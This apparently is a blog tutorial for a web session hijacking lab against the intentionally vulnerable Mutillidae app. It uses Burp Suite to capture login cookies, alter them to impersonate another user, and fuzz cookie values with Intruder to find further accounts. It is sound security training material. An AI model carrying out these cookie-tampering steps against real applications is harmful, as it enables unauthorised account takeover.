This is a list of steps to perform to perform a web application session hijacking attack against a logged-in user of a web app. It uses the wonderful Mutillidae (https://www.owasp.org/index.php/OWASP_Mutillidae_2_Project) vulnerable web application for the victim server, Burp Suite (free or pro, https://portswigger.net/burp/download.html) and a web browser (in this case, I’ve chosen Firefox).
This post presupposes that you already have Mutillidae, Burp and Firefox installed and running. If not, please refer to those sites for details on how to accomplish those goals.
- Set up Firefox to use Burp
- Here you can edit the Network settings inside the Advanced section of Firefox’s settings area to add the Burp local proxy. Burp defaults to run on TCP port 8080. So you’ll need to use localhost for the host/IP and 8080 for the port.
- Launch Burp and confirm that you can get traffic from the browser. If not, troubleshoot that then move on.
- In the Mutillidae application, visit the http://YourIPHere/index.php?page=login.php page.
- Click the Please register here link at the bottom of the page to create 2 new users.
- Create 2 different users in this section.
- Go to the login.php page (http://YourIPHere/index.php?page=login.php) in your browser and log in to the application using one of the user accounts.
- Go to Burp and look for the response from the server for the successful log in. It should have 2 new cookies that were set in your browser.
- Go to the Mutillidae app in the browser and browse to another page.
- Send that new request from the Burp Proxy to the Burp Repeater and ensure that both application cookies were sent in the header of the packet.
- Press the GO button in the Repeater function to send an unmodified request to the server.
- In the response frame, you should see that that user is logged in (in the header of the response as well as in the HTML).
- Now, in Burp Repeater, alter each of the cookies that the application set and resubmit the request. See if the username in the response packet changes.
Next Steps could be…
- Extract the cookies from Burp and insert them into the browser to become the other user and browse around the application
- Use Burp Intruder to fuzz the cookie value and find other users that you could become. (Keep in mind who the first user of the application could be).